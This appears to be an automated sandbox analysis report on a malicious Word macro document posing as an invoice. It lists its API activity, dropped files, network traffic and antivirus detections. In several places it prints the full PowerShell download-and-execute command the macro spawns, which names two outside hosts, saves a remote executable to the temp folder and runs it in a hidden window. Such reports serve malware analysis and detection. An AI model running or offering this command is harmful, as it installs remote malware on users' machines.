NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05112000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05113000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05114000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05115000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 11:37 a.m.	process_identifier: 4716 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05116000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$voice_20180704.doc

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile June 25, 2021, 11:37 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000198 filepath: C:\Users\test22\AppData\Local\Temp\~$voice_20180704.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$voice_20180704.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell "'powershell ""function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,''C:\Users\test22\AppData\Local\Temp\sucbjoh.exe'');start-process ''C:\Users\test22\AppData\Local\Temp\sucbjoh.exe'';}try{buhx(''http://icoindna.io/bri.ri'')}catch{buhx(''http://meanmuscles.com/bri.ri'')}'"" \| out-file -encoding ascii -filepath C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat; start-process 'C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat' -windowstyle hidden"
cmdline	cmd /c powershell "'powershell ""function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,''%tmp%\sucbjoh.exe'');start-process ''%tmp%\sucbjoh.exe'';}try{buhx(''http://icoindna.io/bri.ri'')}catch{buhx(''http://meanmuscles.com/bri.ri'')}'"" \| out-file -encoding ascii -filepath %tmp%\owqedtxxw.bat; start-process '%tmp%\owqedtxxw.bat' -windowstyle hidden"
cmdline	powershell "function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,'C:\Users\test22\AppData\Local\Temp\sucbjoh.exe');start-process 'C:\Users\test22\AppData\Local\Temp\sucbjoh.exe';}try{buhx('http://icoindna.io/bri.ri')}catch{buhx('http://meanmuscles.com/bri.ri')}

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW June 25, 2021, 11:37 a.m.	thread_identifier: 4888 thread_handle: 0x0000065c process_identifier: 6692 current_directory: filepath: track: 1 command_line: cmd /c powershell "'powershell ""function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,''%tmp%\sucbjoh.exe'');start-process ''%tmp%\sucbjoh.exe'';}try{buhx(''http://icoindna.io/bri.ri'')}catch{buhx(''http://meanmuscles.com/bri.ri'')}'"" \| out-file -encoding ascii -filepath %tmp%\owqedtxxw.bat; start-process '%tmp%\owqedtxxw.bat' -windowstyle hidden" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000660	1	1
CreateProcessInternalW June 25, 2021, 11:37 a.m.	thread_identifier: 8620 thread_handle: 0x00000084 process_identifier: 4716 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell "'powershell ""function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,''C:\Users\test22\AppData\Local\Temp\sucbjoh.exe'');start-process ''C:\Users\test22\AppData\Local\Temp\sucbjoh.exe'';}try{buhx(''http://icoindna.io/bri.ri'')}catch{buhx(''http://meanmuscles.com/bri.ri'')}'"" \| out-file -encoding ascii -filepath C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat; start-process 'C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat' -windowstyle hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
ShellExecuteExW June 25, 2021, 11:37 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 25, 2021, 11:37 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

Data received	HTTP/1.1 301 Moved Permanently content-type: text/html content-length: 707 date: Fri, 25 Jun 2021 02:38:30 GMT server: LiteSpeed location: https://meanmuscles.com/bri.ri x-turbo-charged-by: LiteSpeed <!DOCTYPE html> <html style="height:100%"> <head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <title> 301 Moved Permanently </title></head> <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"> <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1> <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently </h2> <p>The document has been permanently moved.</p> </div></div></body></html>
Data received
Data received	F

Poweshell is sending data to a remote host (3 events)

Data sent	GET /bri.ri HTTP/1.1 Host: meanmuscles.com Connection: Keep-Alive
Data sent	rn`ÕA}zä`v$\<#Å<;Ý5]göa/5 ÀÀÀ À 28-ÿmeanmuscles.com
Data sent	rn`ÕA}Íäg)È$i,´Ä>º¿¨8]fÑ/5 ÀÀÀ À 28-ÿmeanmuscles.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 25, 2021, 11:37 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 25, 2021, 11:37 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

winword.exe

martian_process

cmd /c powershell "'powershell ""function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,''%tmp%\sucbjoh.exe'');start-process ''%tmp%\sucbjoh.exe'';}try{buhx(''http://icoindna.io/bri.ri'')}catch{buhx(''http://meanmuscles.com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%\owqedtxxw.bat; start-process '%tmp%\owqedtxxw.bat' -windowstyle hidden"

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send June 25, 2021, 11:37 a.m.	buffer: GET /bri.ri HTTP/1.1 Host: meanmuscles.com Connection: Keep-Alive socket: 1488 sent: 71	1	71
send June 25, 2021, 11:37 a.m.	buffer: rn`ÕA}zä`v$\<#Å<;Ý5]göa/5 ÀÀÀ À 28-ÿmeanmuscles.com socket: 1492 sent: 119	1	119
send June 25, 2021, 11:37 a.m.	buffer: rn`ÕA}Íäg)È$i,´Ä>º¿¨8]fÑ/5 ÀÀÀ À 28-ÿmeanmuscles.com socket: 1492 sent: 119	1	119

Libraries known to be associated with a CVE were requested (may be False Positive) (1 event)

cve	CVE-2013-3906

One or more non-whitelisted processes were created (3 events)

parent_process	winword.exe	martian_process	cmd /c powershell "'powershell ""function buhx([string] $coebtarl){(new-object system.net.webclient).downloadfile($coebtarl,''%tmp%\sucbjoh.exe'');start-process ''%tmp%\sucbjoh.exe'';}try{buhx(''http://icoindna.io/bri.ri'')}catch{buhx(''http://meanmuscles.com/bri.ri'')}'"" \| out-file -encoding ascii -filepath %tmp%\owqedtxxw.bat; start-process '%tmp%\owqedtxxw.bat' -windowstyle hidden"
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\owqedtxxw.bat

Creates a suspicious Powershell process (5 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\sucbjoh.exe

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

23.238.35.228:80

Powershell Downloader DFSP detected (1 event)

File has been identified by 46 AntiVirus engines on VirusTotal as malicious (46 events)

MicroWorld-eScan	VB:Trojan.Valyria.1945
FireEye	VB:Trojan.Valyria.1945
CAT-QuickHeal	W97M.Downloader.31772
McAfee	W97M/Downloader.cqq
Sangfor	Malware
Arcabit	VB:Trojan.Valyria.D799
Baidu	VBA.Trojan-Downloader.Agent.ddr
F-Prot	New or modified W97M/Downldr
Symantec	W97M.Downloader
ESET-NOD32	PowerShell/TrojanDownloader.Agent.ASG
TrendMicro-HouseCall	W2KM_POWLOAD.NSFBAHAK
Avast	Other:Malware-gen [Trj]
ClamAV	Doc.Dropper.Agent-6600713-0
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	VB:Trojan.Valyria.1945
NANO-Antivirus	Trojan.Script.Agent.gmbdhn
AegisLab	Trojan.Script.Agent.4!c
Rising	Downloader.Donoff!8.36C (TOPIS:E0:PHAaO9stmTE)
Ad-Aware	VB:Trojan.Valyria.1945
Emsisoft	VB:Trojan.Valyria.1945 (B)
Comodo	Malware@#1i4pxqqsfvgrn
F-Secure	Malware.W97M/Agent.0664013
DrWeb	Exploit.Siggen.6257
TrendMicro	W2KM_POWLOAD.NSFBAHAK
Sophos	Troj/DocDl-ORM
Ikarus	Trojan-Downloader.VBA.Agent
Cyren	W97M/Downldr
Avira	W97M/Agent.0664013
MAX	malware (ai score=99)
Antiy-AVL	Trojan[Downloader]/MSOffice.Agent.x
Microsoft	TrojanDownloader:O97M/Donoff
Endgame	malicious (high confidence)
ViRobot	W97M.S.Downloader.82432.K
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	VB:Trojan.Valyria.1945
Cynet	Malicious (score: 85)
AhnLab-V3	VBA/Downloader
ALYac	Trojan.Downloader.VBA.gen
VBA32	Trojan-Downloader.O97M.Donoff
Tencent	Win32.Trojan-downloader.Agent.Wrgt
Yandex	Trojan.Mofer.bSCvry.21
SentinelOne	DFI - Malicious OLE
Fortinet	VBA/Agent.32DC!tr.dldr
AVG	Other:Malware-gen [Trj]
Panda	O97M/Downloader
Qihoo-360	Generic/Trojan.Script.ed4

Invoice_20180704.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All